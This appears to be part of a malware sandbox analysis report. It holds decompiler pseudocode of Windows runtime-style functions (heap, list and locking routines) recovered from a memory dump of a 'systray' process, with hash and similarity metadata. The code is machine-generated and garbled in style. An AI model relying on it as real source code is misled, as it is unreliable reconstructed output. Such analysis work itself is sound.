                                            						_t72 =  *_t72;
                                            						continue;
                                            					}
                                            					_t30 = _t72 + 0x10; // 0x10
                                            					if(E045ED4F0(_t30, _t65, _t57) == _t57) {
                                            						return 0xb7;
                                            					}
                                            					_t65 = _v8;
                                            					goto L24;
                                            				}
                                            				_t61 = _t57;
                                            				_push( &_v12);
                                            				_t66 = 0x10;
                                            				if(E045CE5E0(_t57, _t66) < 0) {
                                            					return 0x216;
                                            				}
                                            				_t73 = L045B4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                            				if(_t73 == 0) {
                                            					_t38 = 0xe;
                                            					return _t38;
                                            				}
                                            				_t9 = _t73 + 0x10; // 0x10
                                            				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                            				E045DF3E0(_t9, _v8, _t57);
                                            				_t41 =  *_t70;
                                            				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                            					_t62 = 3;
                                            					asm("int 0x29");
                                            					_push(_t62);
                                            					_push(_t57);
                                            					_push(_t73);
                                            					_push(_t70);
                                            					_t71 = _t62;
                                            					_t74 = 0;
                                            					_v36 = 0;
                                            					_t63 = E045CA2F0(_t62, _t71, 1, 6,  &_v36);
                                            					if(_t63 == 0) {
                                            						L20:
                                            						_t44 = 0x57;
                                            						return _t44;
                                            					}
                                            					_t45 = _v12;
                                            					_t58 = 0x1c;
                                            					if(_t45 < _t58) {
                                            						goto L20;
                                            					}
                                            					_t69 = _t45 / _t58;
                                            					if(_t69 == 0) {
                                            						L19:
                                            						return 0xe8;
                                            					}
                                            					_t59 = _v0;
                                            					do {
                                            						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                            							goto L18;
                                            						}
                                            						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                            						 *_t59 = _t49;
                                            						if( *_t49 != 0x53445352) {
                                            							goto L18;
                                            						}
                                            						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                            						return 0;
                                            						L18:
                                            						_t63 = _t63 + 0x1c;
                                            						_t74 = _t74 + 1;
                                            					} while (_t74 < _t69);
                                            					goto L19;
                                            				}
                                            				 *_t73 = _t41;
                                            				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                            				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                            				 *_t70 = _t73;
                                            				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                            				return 0;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                            • Instruction ID: a7df7d1fca49aa55ead640afb8529e686a87618eb0fe2cd787e6fb4bdb423f57
                                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                            • Instruction Fuzzy Hash: 19217FB1A00305EFDB30DF99C844AAAF7F8FF58714F14886AE945A7210E230B900DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E0466070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                            				char _v8;
                                            				intOrPtr _v11;
                                            				signed int _v12;
                                            				intOrPtr _v15;
                                            				signed int _v16;
                                            				intOrPtr _v28;
                                            				void* __ebx;
                                            				char* _t32;
                                            				signed int* _t38;
                                            				signed int _t60;
                                            
                                            				_t38 = __ecx;
                                            				_v16 = __edx;
                                            				_t60 = E046607DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                            				if(_t60 != 0) {
                                            					_t7 = _t38 + 0x38; // 0x29cd5903
                                            					_push( *_t7);
                                            					_t9 = _t38 + 0x34; // 0x6adeeb00
                                            					_push( *_t9);
                                            					_v12 = _a8 << 0xc;
                                            					_t11 = _t38 + 4; // 0x5de58b5b
                                            					_push(0x4000);
                                            					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                            					E0465AFDE( &_v8,  &_v12);
                                            					E04661293(_t38, _v28, _t60);
                                            					if(E045B7D50() == 0) {
                                            						_t32 = 0x7ffe0380;
                                            					} else {
                                            						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            					}
                                            					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                            						E046514FB(_t38,  *_t21, _v11, _v15, 0xd);
                                            					}
                                            				}
                                            				return  ~_t60;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                            • Instruction ID: 47e01f63959a3773c7d090aaf5998c56b7a685603429b55069bd950eb02a96c8
                                            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                            • Instruction Fuzzy Hash: 12210436204200AFD705DF18C880BAABBA5FFD4350F04866DF9968B395E730ED09CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E04599240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                            				intOrPtr _t33;
                                            				intOrPtr _t37;
                                            				intOrPtr _t41;
                                            				intOrPtr* _t46;
                                            				void* _t48;
                                            				intOrPtr _t50;
                                            				intOrPtr* _t60;
                                            				void* _t61;
                                            				intOrPtr _t62;
                                            				intOrPtr _t65;
                                            				void* _t66;
                                            				void* _t68;
                                            
                                            				_push(0xc);
                                            				_push(0x466f708);
                                            				E045ED08C(__ebx, __edi, __esi);
                                            				_t65 = __ecx;
                                            				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                            				if( *(__ecx + 0x24) != 0) {
                                            					_push( *(__ecx + 0x24));
                                            					E045D95D0();
                                            					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                            				}
                                            				L6();
                                            				L6();
                                            				_push( *((intOrPtr*)(_t65 + 0x28)));
                                            				E045D95D0();
                                            				_t33 =  *0x46884c4; // 0x0
                                            				L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                            				_t37 =  *0x46884c4; // 0x0
                                            				L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                            				_t41 =  *0x46884c4; // 0x0
                                            				E045B2280(L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x46886b4);
                                            				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                            				_t46 = _t65 + 0xe8;
                                            				_t62 =  *_t46;
                                            				_t60 =  *((intOrPtr*)(_t46 + 4));
                                            				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                            					_t61 = 3;
                                            					asm("int 0x29");
                                            					_push(_t65);
                                            					_t66 = _t61;
                                            					_t23 = _t66 + 0x14; // 0x8df8084c
                                            					_push( *_t23);
                                            					E045D95D0();
                                            					_t24 = _t66 + 0x10; // 0x89e04d8b
                                            					_push( *_t24);
                                            					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                            					_t48 = E045D95D0();
                                            					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                            					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                            					return _t48;
                                            				} else {
                                            					 *_t60 = _t62;
                                            					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                            					 *(_t68 - 4) = 0xfffffffe;
                                            					E04599325();
                                            					_t50 =  *0x46884c4; // 0x0
                                            					return E045ED0D1(L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                            				}
                                            			}
















                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d9123d6ea50d53e4e5ef545bbf795789d10e09308cc0d9d09cf8f00211b655e7
                                            • Instruction ID: 4a73483ce0a47e18ed4f32b566f744ae2ea78fed54ef89791f0f01e71c36949c
                                            • Opcode Fuzzy Hash: d9123d6ea50d53e4e5ef545bbf795789d10e09308cc0d9d09cf8f00211b655e7
                                            • Instruction Fuzzy Hash: 70213972040A41EFD725EF28CA00B59B7F9FF48708F54466CA049876A2D634F941EB84
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E046146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                            				signed short* _v8;
                                            				unsigned int _v12;
                                            				intOrPtr _v16;
                                            				signed int _t22;
                                            				signed char _t23;
                                            				short _t32;
                                            				void* _t38;
                                            				char* _t40;
                                            
                                            				_v12 = __edx;
                                            				_t29 = 0;
                                            				_v8 = __ecx;
                                            				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                            				_t38 = L045B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                            				if(_t38 != 0) {
                                            					_t40 = _a4;
                                            					 *_t40 = 1;
                                            					E045DF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                            					_t22 = _v12 >> 1;
                                            					_t32 = 0x2e;
                                            					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                            					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                            					_t23 = E045CD268(_t38, 1);
                                            					asm("sbb al, al");
                                            					 *_t40 =  ~_t23 + 1;
                                            					L045B77F0(_v16, 0, _t38);
                                            				} else {
                                            					 *_a4 = 0;
                                            					_t29 = 0xc0000017;
                                            				}
                                            				return _t29;
                                            			}












                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                            • Instruction ID: 5f90b77b30c08748bb7fa7e27d8e1b303aa1f80dd74317d8fd6b69742adf30b2
                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                            • Instruction Fuzzy Hash: 8B110272A04208BFD7119F6C98808BEB7B9FFD5304F10806AF984CB350DA319D55D7A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 46%
                                            			E0462C450(intOrPtr* _a4) {
                                            				signed char _t25;
                                            				intOrPtr* _t26;
                                            				intOrPtr* _t27;
                                            
                                            				_t26 = _a4;
                                            				_t25 =  *(_t26 + 0x10);
                                            				if((_t25 & 0x00000003) != 1) {
                                            					_push(0);
                                            					_push(0);
                                            					_push(0);
                                            					_push( *((intOrPtr*)(_t26 + 8)));
                                            					_push(0);
                                            					_push( *_t26);
                                            					E045D9910();
                                            					_t25 =  *(_t26 + 0x10);
                                            				}
                                            				if((_t25 & 0x00000001) != 0) {
                                            					_push(4);
                                            					_t7 = _t26 + 4; // 0x4
                                            					_t27 = _t7;
                                            					_push(_t27);
                                            					_push(5);
                                            					_push(0xfffffffe);
                                            					E045D95B0();
                                            					if( *_t27 != 0) {
                                            						_push( *_t27);
                                            						E045D95D0();
                                            					}
                                            				}
                                            				_t8 = _t26 + 0x14; // 0x14
                                            				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                            					L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                            				}
                                            				_push( *_t26);
                                            				E045D95D0();
                                            				return L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                            			}







                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                            • Instruction ID: 4cd623ace2d8003bc6c8f4bacc3876cc620471d965128eb26cac63902b549c29
                                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                            • Instruction Fuzzy Hash: E20192B2140A16BFE721AF69CD80EA7FB6DFF94394F004525F15446660DB21BCA1DAA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 69%
                                            			E04599080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                            				intOrPtr* _t51;
                                            				intOrPtr _t59;
                                            				signed int _t64;
                                            				signed int _t67;
                                            				signed int* _t71;
                                            				signed int _t74;
                                            				signed int _t77;
                                            				signed int _t82;
                                            				intOrPtr* _t84;
                                            				void* _t85;
                                            				intOrPtr* _t87;
                                            				void* _t94;
                                            				signed int _t95;
                                            				intOrPtr* _t97;
                                            				signed int _t99;
                                            				signed int _t102;
                                            				void* _t104;
                                            
                                            				_push(__ebx);
                                            				_push(__esi);
                                            				_push(__edi);
                                            				_t97 = __ecx;
                                            				_t102 =  *(__ecx + 0x14);
                                            				if((_t102 & 0x02ffffff) == 0x2000000) {
                                            					_t102 = _t102 | 0x000007d0;
                                            				}
                                            				_t48 =  *[fs:0x30];
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                            					_t102 = _t102 & 0xff000000;
                                            				}
                                            				_t80 = 0x46885ec;
                                            				E045B2280(_t48, 0x46885ec);
                                            				_t51 =  *_t97 + 8;
                                            				if( *_t51 != 0) {
                                            					L6:
                                            					return E045AFFB0(_t80, _t97, _t80);
                                            				} else {
                                            					 *(_t97 + 0x14) = _t102;
                                            					_t84 =  *0x468538c; // 0x77ad6848
                                            					if( *_t84 != 0x4685388) {
                                            						_t85 = 3;
                                            						asm("int 0x29");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						_push(0x2c);
                                            						_push(0x466f6e8);
                                            						E045ED0E8(0x46885ec, _t97, _t102);
                                            						 *((char*)(_t104 - 0x1d)) = 0;
                                            						_t99 =  *(_t104 + 8);
                                            						__eflags = _t99;
                                            						if(_t99 == 0) {
                                            							L13:
                                            							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                            							if(__eflags == 0) {
                                            								E046688F5(_t80, _t85, 0x4685388, _t99, _t102, __eflags);
                                            							}
                                            						} else {
                                            							__eflags = _t99 -  *0x46886c0; // 0x4407b0
                                            							if(__eflags == 0) {
                                            								goto L13;
                                            							} else {
                                            								__eflags = _t99 -  *0x46886b8; // 0x0
                                            								if(__eflags == 0) {
                                            									goto L13;
                                            								} else {
                                            									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                            									__eflags =  *((char*)(_t59 + 0x28));
                                            									if( *((char*)(_t59 + 0x28)) == 0) {
                                            										E045B2280(_t99 + 0xe0, _t99 + 0xe0);
                                            										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                            										__eflags =  *((char*)(_t99 + 0xe5));
                                            										if(__eflags != 0) {
                                            											E046688F5(0x46885ec, _t85, 0x4685388, _t99, _t102, __eflags);
                                            										} else {
                                            											__eflags =  *((char*)(_t99 + 0xe4));
                                            											if( *((char*)(_t99 + 0xe4)) == 0) {
                                            												 *((char*)(_t99 + 0xe4)) = 1;
                                            												_push(_t99);
                                            												_push( *((intOrPtr*)(_t99 + 0x24)));
                                            												E045DAFD0();
                                            											}
                                            											while(1) {
                                            												_t71 = _t99 + 8;
                                            												 *(_t104 - 0x2c) = _t71;
                                            												_t80 =  *_t71;
                                            												_t95 = _t71[1];
                                            												 *(_t104 - 0x28) = _t80;
                                            												 *(_t104 - 0x24) = _t95;
                                            												while(1) {
                                            													L19:
                                            													__eflags = _t95;
                                            													if(_t95 == 0) {
                                            														break;
                                            													}
                                            													_t102 = _t80;
                                            													 *(_t104 - 0x30) = _t95;
                                            													 *(_t104 - 0x24) = _t95 - 1;
                                            													asm("lock cmpxchg8b [edi]");
                                            													_t80 = _t102;
                                            													 *(_t104 - 0x28) = _t80;
                                            													 *(_t104 - 0x24) = _t95;
                                            													__eflags = _t80 - _t102;
                                            													_t99 =  *(_t104 + 8);
                                            													if(_t80 != _t102) {
                                            														continue;
                                            													} else {
                                            														__eflags = _t95 -  *(_t104 - 0x30);
                                            														if(_t95 !=  *(_t104 - 0x30)) {
                                            															continue;
                                            														} else {
                                            															__eflags = _t95;
                                            															if(_t95 != 0) {
                                            																_t74 = 0;
                                            																 *(_t104 - 0x34) = 0;
                                            																_t102 = 0;
                                            																__eflags = 0;
                                            																while(1) {
                                            																	 *(_t104 - 0x3c) = _t102;
                                            																	__eflags = _t102 - 3;
                                            																	if(_t102 >= 3) {
                                            																		break;
                                            																	}
                                            																	__eflags = _t74;
                                            																	if(_t74 != 0) {
                                            																		L49:
                                            																		_t102 =  *_t74;
                                            																		__eflags = _t102;
                                            																		if(_t102 != 0) {
                                            																			_t102 =  *(_t102 + 4);
                                            																			__eflags = _t102;
                                            																			if(_t102 != 0) {
                                            																				 *0x468b1e0(_t74, _t99);
                                            																				 *_t102();
                                            																			}
                                            																		}
                                            																		do {
                                            																			_t71 = _t99 + 8;
                                            																			 *(_t104 - 0x2c) = _t71;
                                            																			_t80 =  *_t71;
                                            																			_t95 = _t71[1];
                                            																			 *(_t104 - 0x28) = _t80;
                                            																			 *(_t104 - 0x24) = _t95;
                                            																			goto L19;
                                            																		} while (_t74 == 0);
                                            																		goto L49;
                                            																	} else {
                                            																		_t82 = 0;
                                            																		__eflags = 0;
                                            																		while(1) {
                                            																			 *(_t104 - 0x38) = _t82;
                                            																			__eflags = _t82 -  *0x46884c0;
                                            																			if(_t82 >=  *0x46884c0) {
                                            																				break;
                                            																			}
                                            																			__eflags = _t74;
                                            																			if(_t74 == 0) {
                                            																				_t77 = E04669063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                            																				__eflags = _t77;
                                            																				if(_t77 == 0) {
                                            																					_t74 = 0;
                                            																					__eflags = 0;
                                            																				} else {
                                            																					_t74 = _t77 + 0xfffffff4;
                                            																				}
                                            																				 *(_t104 - 0x34) = _t74;
                                            																				_t82 = _t82 + 1;
                                            																				continue;
                                            																			}
                                            																			break;
                                            																		}
                                            																		_t102 = _t102 + 1;
                                            																		continue;
                                            																	}
                                            																	goto L20;
                                            																}
                                            																__eflags = _t74;
                                            															}
                                            														}
                                            													}
                                            													break;
                                            												}
                                            												L20:
                                            												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                            												 *((char*)(_t99 + 0xe5)) = 1;
                                            												 *((char*)(_t104 - 0x1d)) = 1;
                                            												goto L21;
                                            											}
                                            										}
                                            										L21:
                                            										 *(_t104 - 4) = 0xfffffffe;
                                            										E0459922A(_t99);
                                            										_t64 = E045B7D50();
                                            										__eflags = _t64;
                                            										if(_t64 != 0) {
                                            											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            										} else {
                                            											_t67 = 0x7ffe0386;
                                            										}
                                            										__eflags =  *_t67;
                                            										if( *_t67 != 0) {
                                            											_t67 = E04668B58(_t99);
                                            										}
                                            										__eflags =  *((char*)(_t104 - 0x1d));
                                            										if( *((char*)(_t104 - 0x1d)) != 0) {
                                            											__eflags = _t99 -  *0x46886c0; // 0x4407b0
                                            											if(__eflags != 0) {
                                            												__eflags = _t99 -  *0x46886b8; // 0x0
                                            												if(__eflags == 0) {
                                            													_t94 = 0x46886bc;
                                            													_t87 = 0x46886b8;
                                            													goto L27;
                                            												} else {
                                            													__eflags = _t67 | 0xffffffff;
                                            													asm("lock xadd [edi], eax");
                                            													if(__eflags == 0) {
                                            														E04599240(_t80, _t99, _t99, _t102, __eflags);
                                            													}
                                            												}
                                            											} else {
                                            												_t94 = 0x46886c4;
                                            												_t87 = 0x46886c0;
                                            												L27:
                                            												E045C9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                            											}
                                            										}
                                            									} else {
                                            										goto L13;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						return E045ED130(_t80, _t99, _t102);
                                            					} else {
                                            						 *_t51 = 0x4685388;
                                            						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                            						 *_t84 = _t51;
                                            						 *0x468538c = _t51;
                                            						goto L6;
                                            					}
                                            				}
                                            			}





















                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c83d0e1cf598a0c9b290e85c87c3d7161236b3a291489851e9492f94483b007a
                                            • Instruction ID: 427c648667bb263fd5b3cde9cdeb35fa8f0342989738478df56f61d8827f2bfc
                                            • Opcode Fuzzy Hash: c83d0e1cf598a0c9b290e85c87c3d7161236b3a291489851e9492f94483b007a
                                            • Instruction Fuzzy Hash: 0801F4B2601200AFE7149F04E840B15BBE9FF81324F21416EE111DB791E374FC41DB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E04664015(signed int __eax, signed int __ecx) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed char _t10;
                                            				signed int _t28;
                                            
                                            				_push(__ecx);
                                            				_t28 = __ecx;
                                            				asm("lock xadd [edi+0x24], eax");
                                            				_t10 = (__eax | 0xffffffff) - 1;
                                            				if(_t10 == 0) {
                                            					_t1 = _t28 + 0x1c; // 0x1e
                                            					E045B2280(_t10, _t1);
                                            					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                            					E045B2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x46886ac);
                                            					E0459F900(0x46886d4, _t28);
                                            					E045AFFB0(0x46886ac, _t28, 0x46886ac);
                                            					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                            					E045AFFB0(0, _t28, _t1);
                                            					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                            					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                            						L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                            					}
                                            					_t10 = L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                            				}
                                            				return _t10;
                                            			}








                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05cea6e7eb4e2012484071212cfcf8441f712e83d9110ab3e762af356f49bfe6
                                            • Instruction ID: 2d12603ec4613854e4ef17ebb0d542ddf539de87443681adc178c95cc8f555ba
                                            • Opcode Fuzzy Hash: 05cea6e7eb4e2012484071212cfcf8441f712e83d9110ab3e762af356f49bfe6
                                            • Instruction Fuzzy Hash: 0001DF722019467FE610BF69CD84E57B7ACFF89668B000629F508C7A11DB24FC11CAE4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 61%
                                            			E046514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				short _v54;
                                            				char _v60;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t21;
                                            				intOrPtr _t27;
                                            				intOrPtr _t33;
                                            				intOrPtr _t34;
                                            				signed int _t35;
                                            
                                            				_t32 = __edx;
                                            				_t27 = __ebx;
                                            				_v8 =  *0x468d360 ^ _t35;
                                            				_t33 = __edx;
                                            				_t34 = __ecx;
                                            				E045DFA60( &_v60, 0, 0x30);
                                            				_v20 = _a4;
                                            				_v16 = _a8;
                                            				_v28 = _t34;
                                            				_v24 = _t33;
                                            				_v54 = 0x1034;
                                            				if(E045B7D50() == 0) {
                                            					_t21 = 0x7ffe0388;
                                            				} else {
                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				_push( &_v60);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t21 & 0x000000ff);
                                            				return E045DB640(E045D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                            			}


















                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd0c0c1c95a6e098fbbfaac3a37fe4a6c5154094b95c44f5ccb7a1ca6fb0fc6d
                                            • Instruction ID: 10525c9093b9c82b0cfa509865116362321e846863f7e6920c3b2196d6822869
                                            • Opcode Fuzzy Hash: fd0c0c1c95a6e098fbbfaac3a37fe4a6c5154094b95c44f5ccb7a1ca6fb0fc6d
                                            • Instruction Fuzzy Hash: 44018071A01258AFDB10DF68D841EAEB7B8EF85700F00405AB905EB280E674EE00DB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 61%
                                            			E0465138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				short _v54;
                                            				char _v60;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t21;
                                            				intOrPtr _t27;
                                            				intOrPtr _t33;
                                            				intOrPtr _t34;
                                            				signed int _t35;
                                            
                                            				_t32 = __edx;
                                            				_t27 = __ebx;
                                            				_v8 =  *0x468d360 ^ _t35;
                                            				_t33 = __edx;
                                            				_t34 = __ecx;
                                            				E045DFA60( &_v60, 0, 0x30);
                                            				_v20 = _a4;
                                            				_v16 = _a8;
                                            				_v28 = _t34;
                                            				_v24 = _t33;
                                            				_v54 = 0x1033;
                                            				if(E045B7D50() == 0) {
                                            					_t21 = 0x7ffe0388;
                                            				} else {
                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				_push( &_v60);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t21 & 0x000000ff);
                                            				return E045DB640(E045D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
